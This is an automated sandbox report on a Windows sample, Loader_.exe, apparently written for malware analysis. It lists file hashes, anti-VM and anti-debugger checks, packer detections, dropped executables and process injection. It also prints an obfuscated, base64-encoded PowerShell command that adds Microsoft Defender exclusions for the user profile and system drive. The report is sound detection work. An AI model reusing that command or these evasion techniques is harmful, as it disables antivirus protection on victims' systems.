Analysis
-
max time kernel
32s -
max time network
22s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
15/07/2023, 22:34
Behavioral task
behavioral1
Sample
Loader_.exe
Resource
win7-20230712-en
General
-
Target
Loader_.exe
-
Size
21.0MB
-
MD5
5c68101e796d08e0f5a0c9f5bc78cc80
-
SHA1
d0c59230ffec87ae971b0cd1e8a3a5dc0628bb03
-
SHA256
b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec
-
SHA512
e8bb3e3389c3f149fa34533667e5d86902521037d3b9a8d5bf95598be96f78365777ca76d614bbdc9361b35b9006b2b093a4a2f678064e093a5fbdfb3d2e917a
-
SSDEEP
393216:6wPBZ5c2iENnfa5v3InT8OSmJ8pzV24UwwSXSDvRIrFoXYj4aUWHe+QLIrssSCwQ:6uP3isnfa5f/mKZimkqrFoFaU3Ipxr
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Loader_.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader_.exe -
Executes dropped EXE 4 IoCs
pid Process 2832 compiled.exe 2684 ProgressBarSplash.exe 1160 OMM Loader.exe 1208 Process not Found -
Loads dropped DLL 3 IoCs
pid Process 2244 Loader_.exe 2832 compiled.exe 2832 compiled.exe -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x0008000000012024-61.dat agile_net behavioral1/files/0x0008000000012024-65.dat agile_net behavioral1/files/0x0008000000012024-66.dat agile_net -
resource yara_rule behavioral1/memory/2244-54-0x0000000000400000-0x0000000002772000-memory.dmp themida behavioral1/memory/2244-56-0x0000000000400000-0x0000000002772000-memory.dmp themida behavioral1/memory/2244-64-0x0000000000400000-0x0000000002772000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Loader_.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2244 Loader_.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2436 2244 Loader_.exe 28 PID 2244 wrote to memory of 2436 2244 Loader_.exe 28 PID 2244 wrote to memory of 2436 2244 Loader_.exe 28 PID 2244 wrote to memory of 2436 2244 Loader_.exe 28 PID 2244 wrote to memory of 2832 2244 Loader_.exe 30 PID 2244 wrote to memory of 2832 2244 Loader_.exe 30 PID 2244 wrote to memory of 2832 2244 Loader_.exe 30 PID 2244 wrote to memory of 2832 2244 Loader_.exe 30 PID 2832 wrote to memory of 2684 2832 compiled.exe 31 PID 2832 wrote to memory of 2684 2832 compiled.exe 31 PID 2832 wrote to memory of 2684 2832 compiled.exe 31 PID 2832 wrote to memory of 2684 2832 compiled.exe 31 PID 2832 wrote to memory of 1160 2832 compiled.exe 32 PID 2832 wrote to memory of 1160 2832 compiled.exe 32 PID 2832 wrote to memory of 1160 2832 compiled.exe 32 PID 2832 wrote to memory of 1160 2832 compiled.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader_.exe"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Users\Admin\compiled.exe"C:\Users\Admin\compiled.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe" -unpacking3⤵
- Executes dropped EXE
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe"C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe"3⤵
- Executes dropped EXE
PID:1160
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
87KB
MD5ed001288c24f331c9733acf3ca3520b0
SHA11e935afba79825470c54afaec238402d068ddefa
SHA2566c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444
-
Filesize
87KB
MD5ed001288c24f331c9733acf3ca3520b0
SHA11e935afba79825470c54afaec238402d068ddefa
SHA2566c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
87KB
MD5ed001288c24f331c9733acf3ca3520b0
SHA11e935afba79825470c54afaec238402d068ddefa
SHA2566c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444
-
Filesize
29.4MB
MD5b763ec0b17dcf0adc1416a900c4551ac
SHA17216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75